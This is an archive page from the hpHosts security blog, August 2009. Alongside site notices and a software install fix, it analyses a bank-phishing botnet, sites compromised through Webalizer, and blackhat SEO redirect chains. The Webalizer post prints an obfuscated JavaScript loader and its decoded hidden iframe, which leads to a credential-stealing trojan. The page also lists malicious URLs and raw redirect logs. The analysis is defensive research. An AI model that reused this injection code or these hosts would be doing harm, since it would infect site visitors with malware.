Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 31 August 2009

WARNING: malwarecrypt.com

Just a warning folks, it seems a squatter snatched malwarecrypt.com when it expired (no idea who the squatter is, as the WhoIs is hidden), and before Jintan (the domains previous owner) could renew it (his hosting company/registrar, A Small Orange (asmallorange.com) didn't warn him that it was due to expire.

He's contacted ASO to try and get it back. I'll let you know what happens.

Full Circle Magazine: Issue 28

Yes indeedy folks, here it is, Full Circle #28!

This month:

* Command and Conquer
* How-To : Program in Python – Part 2, LAMP Server – Part 1, Networking with SSHFS
and Fast Internet With Squid.
* My Story – My Linux Experience I and II.
* My Opinion – AllMyApps
* Review – Tellico.
* MOTU Interview – Stephane Graber.
* Top 5 – SIP Clients.
* Ubuntu Women Interview, Ubuntu Games and all the usual goodness!

Read more
http://fullcirclemagazine.org/2009/08/30/full-circle-28-out-now/

Get it while it's hot!
http://fullcirclemagazine.org/issue-28/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Saturday, 29 August 2009

Info: hpHosts server

Just a note folks, the hpHosts server is currently seeing abnormally high traffic, which slowed it down to a crawl. The server has been rebooted but is obviously still alot slower than normal.

I won't have access to the server until tomorrow, so can't do very much at present.

Wednesday, 26 August 2009

Man beaten and stabbed by Gumtree scammers

Police today warned users of the popular classifieds website Gumtree to be on their guard after a man who responded to a car advert was almost killed in a brutal robbery.

On July 30 the 42-year-old took a large amount of cash to meet the supposed seller of a VW Golf in Barking, east London. He was punched, kicked and stabbed while trying to hold on to his bag, witnesses reported.

He was rushed to hospital for life-saving surgery.

It later emerged that the registered owner of the Golf had no idea it had been advertised for sale.


Read more
http://www.theregister.co.uk/2009/08/26/gumtree_warning/

Fix: Setup failed to install the required component Microsoft SQL Server 2005 Express

I received this error when trying to install the Business Contacts Manager that came with Microsoft Office Professional 2007.

After getting the exact same error when installing Microsoft Office Accounting 2009, I decided to try and find a fix again (didn't look much the first time as I don't really need Business Contacts Manager), and finally found one (thanks to NeilH10 in the MSDN Forums).

For those experiencing this, the following is what you need to do to resolve this;

1. Load Programs and Features (Windows Vista/Windows 7) or Add/Remove Programs (Windows XP or below)
2. Uninstall the following;

Microsoft SQL Server native client
Microsoft SQL Server Setup Support files
Microsoft SQL Server VSS writer

3. Delete or rename, the contents of the following folder

C:\Program Files\Microsoft SQL Server\

4. Re-run the installer for Business Contacts Manager (or whichever program's installer gave the error)

The above fix worked perfectly for me on Vista.

Surprisingly, I wasn't able to identify anything at all on the Microsoft site concerning this particular issue?

http://www.google.co.uk/search?hl=en&q=%22Setup+failed+to+install+the+required+component+Microsoft+SQL+Server+2005+Express%22+site%3Amicrosoft.com&meta=

Tuesday, 25 August 2009

Spambot Search Tool: v0.37a

I've got another SBST release for you. Forgot to change the version number from .37 to .38, so this one is .37a ;o)

Changes:

* Fixed MySQL view when there is less than 100 records
* Fixed fSpamlist query for check_spammers_plain.php (made a typo in the URL)
* Changed SFS link in web UI to stopforumspam/search (requested)
* Fixed BotScout query (I broke it in the previous version)

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Friday, 21 August 2009

Update: Network downtime

Just an update folks. The electricity board guys are here and have advised the electric is going to be off all day (this is going to be a nightmare ....), not just a couple of hours.

References:
http://hphosts.blogspot.com/2009/08/important-notice-of-downtime.html

Thursday, 20 August 2009

Spambot Search Tool v0.37

v0.37 has now been released and includes a re-written function for querying fSpamlist.

Note, as of this release, you will now be required to enter an API key to query the fSpamlist database. You can register for this at fspamlist.com.

Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Please note, those using v0.35 or earlier will have likely already noticed the fSpamlist query does not function, and those using 0.36 have until the end of September to upgrade to 0.37, which is the date the special temporary page I created (to give me time to re-write the fspamlist queries), will be removed from the server.

IMPORTANT: Notice of downtime

Just a note folks, I've just been made aware of pending downtime that will be occuring when the electricity company comes to upgrade the circuits.

When is this occuring?

This will be occuring as of 0700 GMT August 21st.

How long will it last?

I do not currently know how long it will last, but estimates so far suggest the electricity board should be finished by 08:30, meaning the network should be back online around 0900 GMT.

Sites affected

*.mysteryfcm.co.uk
*.hosts-file.net
*.fspamlist.com
helenbenoist.co.uk
bughunter.it-mate.co.uk
pbone.it-mate.co.uk
hollmen.it-mate.co.uk

Other services affected

sGB - Mail server (i.e. new guestbook notifications, new registrations)
sURL - hpHosts access for querying blacklisted domains
Spambot Search Tool - fSpamlist queries
hpObserver - hpHosts queries

I've still got a mobile internet dongle and the laptop, so will update you if it is going to take any longer (I'll not know until the guy from the electric board tells me).

Wednesday, 19 August 2009

hpHosts: Mass removal

Just a note folks, I'm planning on having a new hpHosts release out within the next 6 hours or so, and after finishing the final round of validation (lasted 7 days this time, instead of the usual 4-5), there's 4462 domains currently being removed from the database as I write this, due to their failing to resolve (they will continue to be monitored, just incase they spring back to life).

As always, the complete list is available in removed.txt, available via the hpHosts download page.

The Retro-Virus

Nowadays we see lots of malicious software that is designed to steal money and information. A new virus was recently discovered that seems to be all about proving a concept rather than blatant maliciousness.

The Win32/Induc.A virus does not infect like most viruses do. Delphi is a programming language. Induc infected the Delphi IDE so that when the programmers compile their programs the programs are already infected.

As far as we are able to determine at this time, this virus went undetected since April 2009. Most of the samples of infected files we have seen are other trojans, mainly those that steal bank information. So, we detected the Trojan, but didn’t know that it was also infected.

For the average user the virus is essentially harmless. The problem is that some software development companies use Delphi, got infected, and when we added detection for Win32/Induc.A their programs were detected. Some of these companies accused ESET of having false positives when their programs were actually infected!


Read more
http://www.eset.com/threat-center/blog/2009/08/19/the-retro-virus

Tuesday, 18 August 2009

Spambot Search Tool: Notice to all users

This is a notice to all those using the Spambot Search Tool. As of around a week or so ago, fSpamlist started requiring an API key for querying the fSpamlist database.

Obviously, because of this, the last SBST update, included a new special URL to allow me time to convert the SBST over to the new API. This obviously will have meant that those that have still not upgraded to SBST v0.36, will not see normal functionality when it queries fSpamlist.

To stop me rambling, I'll get to the point. As of the next SBST update, you will be required to enter an API key before the SBST will query the FSL database (this will obviously require a change to config.php).

I'll post more on this in due course.

Monday, 17 August 2009

Alert: Alliance & Leicester botnet back ....

Alas it seems the Alliance and Leicester botnet has made a comeback.

www.mybank.alliance-leicester.co.uk.msfileid011.net/customerforms/server10a/form.asp/index.php?ct=mybank3926393725529332640321160295073361820577675979816&em=508xav@it-mate.co.uk

IP's it's resolving to thus far;

124.66.241.125 - fch241125.fch.ne.jp
200.125.70.156 - cpe-156.70.125.200.in-addr.arpa
79.118.245.200 - fiberlink-200-245.pitesti.rdsnet.ro
80.230.64.111 - IGLD-80-230-64-111.inter.net.il
81.182.135.51 - dsl51B68733.pool.t-online.hu
81.218.141.170 - bzq-218-141-170.cablep.bezeqint.net
83.2.169.14 - 83-2-169-14.osiek.net.pl
83.28.198.35 - ble35.neoplus.adsl.tpnet.pl
85.11.156.22 - 85-11-156-22.sofianet.net
88.109.0.81 - 88-109-0-81.dynamic.dsl.as9105.com
89.142.38.95 - BSN-142-38-95.dial-up.dsl.siol.net
92.55.109.137 - Resolution failed
95.76.18.85 - Resolution failed
118.43.8.219 - Resolution failed
124.50.161.180 - Resolution failed

Given these appear to be the only IP's it's resolving to (sending additional DNS requests resulted in no additional IP's being detected) means this is either a small group of friends, or more likely, just a very very very small botnet.

First:



Second:



Third:



Finally:

Sunday, 16 August 2009

Update: Google Webalizer exploits

Just an update on the previous blog. Gerhard (Clean-MX) and Anthony (MalwareURL) have also identified quite a few more compromised hosts;

http://www.malwaredomainlist.com/forums/index.php?topic=3230

And why am I not surprised to see Lunarpages customers in there (hat tip to Anthony ;o)). You'll no doubt remember the last blog on the LP subject.

http://hphosts.blogspot.com/2009/05/federal-reserve-goes-luckysploit.html

As was mentioned in the previous blog, the Lunarpages domains checked STILL contain the exploit code;

http://vurl.mysteryfcm.co.uk/?url=614296
PDF: vURL_Online_-_adammcgrath.ca_Results.pdf

This is now 4 months after Lunarpages were notified, and nothing seems to have been done to either cleanup the affected domains, or prevent it happening again (as evident by the new ones that have turned up). The domains below, courtesy of Anthony at MalwareURL, show those affected at Lunarpages (and there's likely alot more we've not yet identified).

Those I checked have an iFrame leading to microsotf.cn, which thankfully hasn't resolved since July 9th, or an iFrame leading to dakilfu.com (IP: 79.112.224.45 - 79-112-224-45.rdsnet.ro, RO-RCS-RDS-FIBERLINK - AS8708), which then loads 2 more iFrames to;

thestatsdata.com/static.php?q5432 - 89.149.251.84 (89-149-251-84.internetserviceteam.com, NetDirekt - AS28753)
seekandhide365.info/t.php - 79.112.224.45 (79-112-224-45.rdsnet.ro, RO-RCS-RDS-FIBERLINK - AS8708)

thestatsdata.com is returning a 500 error at present, but seekandhide365.info goes on to load several more iFrames from seekandhide365.info;

index.php?query=zinc+supplement&submit=Search
index.php?query=Money&submit=Search
index.php?query=trimed+pussy&submit=Search
index.php?query=oklahoma+real+estate&submit=Search
index.php?query=long+distance+mover&submit=Search
index.php?query=transplanting+banana+tree&submit=Search
index.php?query=Conjunctivitis&submit=Search
index.php?query=garage+door+prices&submit=Search


Along with 2 more from click.rontraffic.com (IP: 69.65.43.142, IPNAP (GigeNET - ECOMD));

click.rontraffic.com/re.php?hid=NDQyOTExMjN8fDEyNTA0OTM0NDN8fDIxMi41Ni45NS4yNTN8fHx8MXx8OXx8d2lyZWxlc3MgYWNjZXNzfHxncmltfHx8fDAuMDAwNHx8MC4wMDF8fGh0dHA6Ly93d3cuaGFuZHlzZWVrLmNvbS9qdW1wMS8/YWZmaWxpYXRlPTU2MDEmc3ViaWQ9NyZ0ZXJtcz13aXJlbGVzcyUyMGFjY2VzcyZzaWQ9WjIzMjA0MzczNyU0MCU0MFFNZmRETjVBRE55OFZNd1V6WDJFMlg0ODFNMFF6TTVRRE0xSVRNJmE9Z3ZjY2J2YWducGd2aXImbXI9MSZyYz0w

click.rontraffic.com/re.php?hid=NDQyOTExMjN8fDEyNTA0OTM0NDN8fDIxMi41Ni45NS4yNTN8fHx8MXx8MTl8fHdpcmVsZXNzIGFjY2Vzc3x8Z3JpbXx8fHwwLjAwMDR8fDAuMDA0fHxodHRwOi8vMTQxLnB1Yi5hZGZpcm1hdGl2ZS5jb20vMi5waHA/c2lkPTE0MSZrZXl3b3JkPXdpcmVsZXNzK2FjY2VzcyZnb3RvPTQ4MzcyZDUyOTA3YThmOTViYWFmZDg1ZTk2ZTVhOGI3LXdzU2ZrM0Zra0YlMDlzd3MuU1UuM1Muc1NGJTA5MnZ2UiUzQSUyRiUyRm5ubi5OSUlIakxvMnFvSUZVUy5xTE90JTJGTklqYUUyLlIyUiUwOVJfYU5mdyUwOXdrdyUwOW5xYUlpSU5OJTJCakVFSU5OJTA5UXFZajR3UzM0JTA5MnZ2UiUzQSUyRiUyRkhFLmJRaU5JamFFMi5RcVlqLkV0USUyRkFxTCUyRk9xTG9uMmp2Lm9paSUzRkVpcUVIdjJhdFd6MiUyNjAlM0Q0d1MzNCUyNmIlM0RPaTYlM0JsMWYyWmhENU5yTjFMSGJmeUVEMUc1Yk9admE4VkVMZVFFNjJIaDFGbFM4aFZFZmtQbkV0WllkbTQ1b3U2OEI5N3ZrOEc1Nlc4alN4RlNkOHk1M1dOclpjV0U0VGwyZmJtNVNQUG5rOTdPTkJ3WnVlSTh1eXB3dXV1aGpFV0JrUVElM0JQdFdSYnd3cmZxbEVPJTNCRzI1VlZIMnY0SmJJbEVMdlBSeGxWbkRSSVdPdUxublRsRWFYUVlOd3VrY0RGTDZzbSUzQlBMUE00OG1Ca3R5ajNjSWtGJTI0SiUwOWYuZmZrJTA5ZiUwOXclMDklMDklMDl3JTA5R0xxdklvK2RxTHpvdFElMDk4NSUwOW5ubi5BaXFMSGIuRXQuV0gmb2JqVGltU3RyPTAuNTg1MjQ0MDArMTI1MDQ5MzQ0Mw==


That lovely bit of Base64 decodes to;

44291123||1250493443||212.56.95.253||||1||19||wireless access||grim||||0.0004||0.004||http://141.pub.adfirmative.com/2.php?sid=141&keyword=wireless+access&goto=48372d52907a8f95baafd85e96e5a8b7-wsSfk3FkkF%09sws.SU.3S.sSF%092vvR%3A%2F%2Fnnn.NIIHjLo2qoIFUS.qLOt%2FNIjaE2.R2R%09R_aNfw%09wkw%09nqaIiINN%2BjEEINN%09QqYj4wS34%092vvR%3A%2F%2FHE.bQiNIjaE2.QqYj.EtQ%2FAqL%2FOqLon2jv.oii%3FEiqEHv2atWz2%260%3D4wS34%26b%3DOi6%3Bl1f2ZhD5NrN1LHbfyED1G5bOZva8VELeQE62Hh1FlS8hVEfkPnEtZYdm45ou68B97vk8G56W8jSxFSd8y53WNrZcWE4Tl2fbm5SPPnk97ONBwZueI8uypwuuuhjEWBkQQ%3BPtWRbwwrfqlEO%3BG25VVH2v4JbIlELvPRxlVnDRIWOuLnnTlEaXQYNwukcDFL6sm%3BPLPM48mBktyj3cIkF%24J%09f.ffk%09f%09w%09%09%09w%09GLqvIo+dqLzotQ%0985%09nnn.AiqLHb.Et.WH&objTimStr=0.58524400+1250493443


Which shows a connection to 141.pub.adfirmative.com (IP: 69.174.35.174 & 69.174.35.172 - LF Media, Inc MZIMA08-CUST-LEADSANDFEEDS01).

The fact they're still carrying the malicious code however, irrespective of the fact the target doesn't exist anymore, means they should still be blacklisted as there's nothing stopping those that hacked them in the first place, updating the code to point to new locations.


dccpa.us
dakistech.com
focalpointfoto.com
lynnmariedesigns.com
thelionkingmind.com
aadamsart.com
rinconmineral.com
hlstudiophoto.com
talon-systems.com
gohoot.com
mattandmelissaberg.com
memories-in-thread.net
healingcreative.com
jjfrancis.com
theatreetc.com
whichhue.com.au
windsorbreads.com
milamstreet.com
flashsrealm.com
shankbonemystic.com
designstage.net
erm-energy-ops.com
happycamperhaven.com
house2homeinspections.biz
madnesscoaching.org
otddelivery.com
smilson.com
elevendistant.com
lockwasherdesign.com
michaelweglinski.com
centralboilerservice.com
fishmaldives.com
distantmind.org
maps-online.org
pathontechnologies.com
usapersonaltraining.com
houseofsixten.com
luginbill.net
behindthescenesmarketing.com
box-mag.com
projectconsultingspecialists.com
rosenbergchiropractic.com
mhergert.com
nextquestion.org
vernonmusic.com
yourpartygirls.net
joydragon.com
geekymom.com
billywhitemusic.com
bognorbadmintonclub.org.uk
sgecon.org
inmex-qro.com
urban-smile.com
cameronandlinda.com
drsaliterman.com
wordwacker.com
kellycatchings.com
canoeflorida.com
unruly1.com
vijgeboom.com
wendycass.net
xzonesports.com
selectgold.com
theboehringers.com
amju.com
lauriello.lunarpages.com


Ref:
http://hosts-file.net/misc/hpObserver_-_Lunarpages.html

Google: Webalizer exploits gone wild!

Okay, so the title may be wierd, but it sounded good and a little appropriate given both are involved (albeit one indirectly). I came across these whilst researching something else, and thought I'd give it a mention.

In short, as shown in the screenshot, these show a slew of sites that appear to have had Webalizer exploited, with some lovely little exploits put on the sites for unwitting victims that happen to visit. Chances are these will possibly load on the sites themselves, regardless of the URL used, if Webalizer files are referenced, but that's pure speculation as I've not checked.

When visiting one of the sites, for example;

dreisbachmotors.com/webalizer/050709wareza/index.html

You see (if you look at the source code), a .js file (images/counter.js) being loaded;


Ref: http://vurl.mysteryfcm.co.uk/?url=813701
Cache (PDF): http://hosts-file.net/misc/dreisbachmotors_com/dreisbachmotors_com.pdf



counter.js then goes on to load yet another site, this time autosloansonlines.com (IP: 89.149.242.190 - php6.nasza-klasa.pl, NetDirekt - AS28753). This then loads yet another site for us;



http://vurl.mysteryfcm.co.uk/?url=813731

The site loaded, 3gp-blogline.com (IP: 89.149.242.190 - php6.nasza-klasa.pl), then goes on to load yak.jpg at autoloansonlines.com, which you've no doubt guessed, isn't a jpg at all, but more Javascript;

a=new Array(3600,13225,9801,12996,11025,12544,13456,
3844,13924,9409,12996,1024,13225,12321,13689,12996,
9801,10201,1024,3721,1156,3721,11236,10609,13225,9604,
12100,10404,1089,13456,13225,10000,3844,1225,11025,13689,
13689,12769,3481,2304,2304,2704,10816,12769,2116,9801,11881,
12544,10816,11881,11236,12321,10404,2209,10000,12544,12100,
2304,2809,2401,2704,2304,11236,12321,2209,10000,10816,11236,
4096,2601,2401,1225,1089,14400,11236,10201,13689,11025,3844,
2500,2401,1089,11025,10404,11236,10816,11025,13689,3844,2500,
2500,2601,1089,13456,13689,14884,11881,10404,3844,1225,14161,
11236,13456,11236,9801,11236,11881,11236,13689,14884,3481,1089,
11025,11236,10201,10201,10404,12321,1225,3969,3721,2304,11236,
10609,13225,9604,12100,10404,3969,1156,3481,1024,13924,9409,12996,
1024,12996,10201,13225,13689,11664,13456,1024,3721,1024,1156,1156,
3481,1024,169,100,10404,12321,12996,1600,13924,9409,12996,1024,
11025,3721,2304,3481,11025,3600,13225,12321,13689,12996,9801,10201,
2116,11664,10201,12100,10609,13456,10816,3481,11025,1849,1849,1681,
1024,12996,10201,13225,13689,11664,13456,1849,3721,6889,13456,12996,
11025,12100,10609,2116,10404,12996,12321,11881,4489,10816,9409,
12996,4489,12321,10000,10201,1600,13225,12321,13689,12996,9801,
10201,2116,9801,10816,9409,12996,4489,12321,10000,10201,4225,13456,
1600,11025,1681,2025,2401,1681,3481,1024,169,100,10000,12321,9801,
13689,11881,10201,12100,13456,2116,14161,12996,11025,13456,10201,
1600,12996,10201,13225,13689,11664,13456,1681,3481,1024,3600,2209,
13225,9801,12996,11025,12544,13456,3844);for(var p in a){document.write(String.fromCharCode(Math.sqrt(a[p])));};


Which decodes to;

<script>var source ="=jgsbnf!tsd>#iuuq;004hq.cmphmjof/dpn05140jo/dhj@31#!xjeui>21!ifjhiu>223!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);

document.write(result); </script>


Which decodes to;

<iframe src="http://3gp-blogline.com/403/in.cgi?20" width=10 height=112 style="visibility: hidden"></iframe>


This then redirects to;

extex-events.ru/temp/ (IP: 80.90.114.11, SmartLogic Ltd., Russia)

In this particular case, it didn't seem to go any further. However, checking one of the others, led me through;

jkk.tw/in.cgi?5¶meter=jkk (IP: 213.163.84.28, Serverboost IP space)
rmi.tw/in.cgi?6 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/show.php?s=5015ba5606 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/url=about:blank (IP: 213.163.84.28, Serverboost IP space)



This decodes to;



A more readable version of the decoded JS is available at (couldn't post it here obviously as it would send the AV's flying):
http://wepawet.cs.ucsb.edu/view.php?hash=044a1831bdc8b81eae428c16fb3123b0&type=js

Which serves up the payload (in this case a credential stealing trojan - how nice!) from;

blt.kz/1/load.php?e=6
VT: http://www.virustotal.com/analisis/0b119b14f5acc63cd18a42b64b4c88da27c70af1e8c4af3dd8322228854fe872-1250346350
TE: http://www.threatexpert.com/report.aspx?md5=3ff5ae22e70e8d26923fda7ad3a9e46d

If you've already been to the above, you're either served up the fake 404 without the additional exploit code, or, it redirects to the following, which sadly 404s for me;

online358.net/work/show.php (IP: 195.88.190.240 Bigness group Ltd. Network, Russia)

Affected sites as currently listed in Google;

lappedilla.no/webalizer/050709wareza/crack=45=keygen=serial.html
actionitems.itone.net/webalizer/.../download=crack=view=19=keygen.html
georgelwilliams.com/webalizer/.../crack=41=keygen=serial.html
greenenergy.com.pe/webalizer/.../crack=7=keygen=serial.html
maemaematernity.com/webalizer/.../crack=1=keygen=serial.html
eco-gen.com/webalizer/050709wareza/crack=16=keygen=serial.html
mahdilib.ir/webalizer/.../crack=8=keygen=serial.html
americanmatrubber.com/webalizer/.../crack=5=keygen=serial.html
greystoneloan.com/webalizer/.../crack=40=keygen=serial.html
navast.com/webalizer/.../crack=58=keygen=serial.html
bsatroop91.org/webalizer/050709wareza/crack=4=keygen=serial.html
crazyhorsetoo.com/webalizer/.../crack=66=keygen=serial.html
dowa-tht.com/webalizer/050709wareza/crack=23=keygen=serial.html
garber-properties.com/webalizer/.../crack=12=keygen=serial.html
dirrtyhairy.com/webalizer/.../crack=35=keygen=serial.html
vancityweddings.com/webalizer/.../crack=25=keygen=serial.html
brighidswell.info/webalizer/.../download=crack=view=10=keygen.html
sygy.org/webalizer/050709wareza/crack=8=keygen=serial.html
irusniroo.com/webalizer/.../crack=11=keygen=serial.html
dreisbachmotors.com/webalizer/050709wareza/index.html
gameophilia.net/webalizer/.../crack=2=keygen=serial.html
gameophilia.net/webalizer/.../crack=63=keygen=serial.html
tiemphong.com/webalizer/.../crack=45=keygen=serial.html
matthewscraftsunique.com/webalizer/.../crack=53=keygen=serial.html
explorerecuador.com/webalizer/.../crack=3=keygen=serial.html
explorerecuador.com/webalizer/.../crack=22=keygen=serial.html
darwebhosting.com/webalizer/.../crack=7=keygen=serial.html
contactchange.com/webalizer/.../crack=10=keygen=serial.html
darbutterfly.com/webalizer/.../crack=35=keygen=serial.html
consulatebrazil.com/webalizer/.../crack=32=keygen=serial.html


Ref:
http://hosts-file.net/misc/hpObserver_-_Webalizer_exploits.html

Wednesday, 12 August 2009

Yet more blackhat SEO from the Internet Service Team and NetDirekt

Following on from the previous documentation on the blackhat SEO campaigns going on in the search engines at present, I've noticed over the past few weeks, that those I previously documented, using filenames such as cadets.php, with the .js file, were mysteriously leading to 404 pages.

Thankfully (or disappointingly, depending on which way you want to look at it), they're still making it super easy to identify their malicious domains. Such as the following for example;

Host: received-latest-microsoft-update.alk.stromiko.com
Current IP: 95.168.191.96
IP PTR: 95.168.191.96.internetserviceteam.com

You'll no doubt have noticed our dear friends at the IST, or missed the fact that whilst the IP range is registered to V3SERVERS-NET-967806 (v3servers.net), it also just so happens to be on the NetDirekt AS - coinkydink? I don't think so.

Getting back to it. Feed this domain a Google referer (I've not tested it, but am 99% sure it'll also work if you feed it a Bing, Live or Yahoo etc referer too), and you're taken to triwoperl.com (IP: 95.168.191.19 - 95.168.191.19.internetserviceteam.com), which looks like an ordinary search page.


Alas however, you'll no doubt have guessed, that you're not actually taken to the domains it claims you'll be taken to - nope, instead, you're taken through;

GET /feed/click.php?u=aHR0cDovLzIwOC45NC4yMzMuNDAvZ28ucGhwP2RhdGE9czVuS3oxdDYzcGkyYTdjaFJpelZ3Tmo4UjV0TDY2biUyRkpTcVNyRXlFNURzMVhIeVNmJTJGQkVLYktyUFhSUTBabkxQeHg0YmxmViUyQm44JTJGU29wY0U2UVVCSGxuYzg5MkxieXFPMFA0MEkwVlZUT09jbnloV0VPUyUyQldZZHFtdiUyRkRRQVRjOTk4WUtzeE1wZFRMWDJJOTdNaFU0RUJuWTh2aXBoalFKZ0JocmtoWkhidkFnaWxIR2xhcTAwTHlkT2YlMkJBQTZxdHpNUnR0WTdMWSUyRm5BQyUyRnJTRHFUYnNvQTdDU0RiNHBQQjZxWnBDbWcyR1dMT3Vub0FYSUNGdiUyRjJraVlLcEx0JTJCc1ElMkZ3byUyQk96T2d1MiUyQlYzeUFQTVlpOXBVWFNJelMxalFRczFtWGJ5cEZLdWFhTjhnOWtFWjhWVFo5VFpyTSUyQlBrenBtMXFMMnZMSjUlMkZ4ZG02SSUyQjR5Vk82alJLZCUyQktTdGNsbEJqNUVTQmtUeEJ4aHUyOUJLQ2glMkZvSU5HYng4JTJCcW10eUdld3lzSm1Wc2JNbEFrVjhPZ2ZMN3E4UDZLdjA5aWNaSVRmbGxVeE9hMHV1WXVMRkRPT1lwYUxYJTJCaW5qY3dnNSUyQnZlMiUyQjViY2VpbjlWaGhWN2JUaFRkSDh2QlpNRkFzWHdMYzJDJTJCYU9CZXJ4Qlh3Nm5POW9iRndocWtybFRnQWRjUVdpT3VhUDJLR0VaUXFoQXdRTGZyVWVOc3F5UjRsTWJmc0xwZkh4QVBMVUViTjFDbW5TekY4UE9qYm9wdlBNTE5leEUwejlEbUpQdGZzOWRjbkE3emp2YXBJTUEzOGdBN0ltNWt5Mjd5VWxNVyUyRkJySktFZDR4Vml1NDVMNlk4WnVWTjZsMXpKNUpCUGt1RW5lSWMyRmN0MjFLYld3d1dabE1zRmlKcHdHNFNRdEVBbHU2V1ZiRlJoTUFJS2xpN3BjbGUlMkYlMkZ6Y05RS0s5THdBYW1rODZoa3V0bk5sUmxrWG5kaDNlS2x6M3JXMjFtZXZqSFpTd2FwbnlqcHZnZWkzVDJhVTVJOVVkUDVocG1lQUl2SzQlMkZTNXp4RTVqaHpxQWE0UnlNTUhLWkFKMlN2MU5YTzJiMXZUS2VHJTJCeHJVJTJGbklucHZsRm54N1RGMENMSmw2UUslMkJ5QldxcG9YNiUyRkJGUTZkQnhMY3U1ZkhNUDdSQnpWNVk3UklHalBraDVubUV0MXF4QktCQ3J6c2NtTEV3c3AzdFlZOVZTU0NxUXo= HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: triwoperl.com
Connection: Keep-Alive
Cookie: cook_aff=19362; cook_saff=200

HTTP/1.1 302 Found
Server: nginx/0.7.61
Date: Wed, 12 Aug 2009 14:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://208.94.233.40/go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV%2Bn8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS%2BWYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf%2BAA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt%2BsQ%2Fwo%2BOzOgu2%2BV3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM%2BPkzpm1qL2vLJ5%2Fxdm6I%2B4yVO6jRKd%2BKStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8%2BqmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX%2Binjcwg5%2Bve2%2B5bcein9VhhV7bThTdH8vBZMFAsXwLc2C%2BaOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG%2BxrU%2FnInpvlFnx7TF0CLJl6QK%2ByBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz
Content-Length: 0

------------------------------------------------------------------
GET /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV%2Bn8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS%2BWYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf%2BAA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt%2BsQ%2Fwo%2BOzOgu2%2BV3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM%2BPkzpm1qL2vLJ5%2Fxdm6I%2B4yVO6jRKd%2BKStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8%2BqmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX%2Binjcwg5%2Bve2%2B5bcein9VhhV7bThTdH8vBZMFAsXwLc2C%2BaOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG%2BxrU%2FnInpvlFnx7TF0CLJl6QK%2ByBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
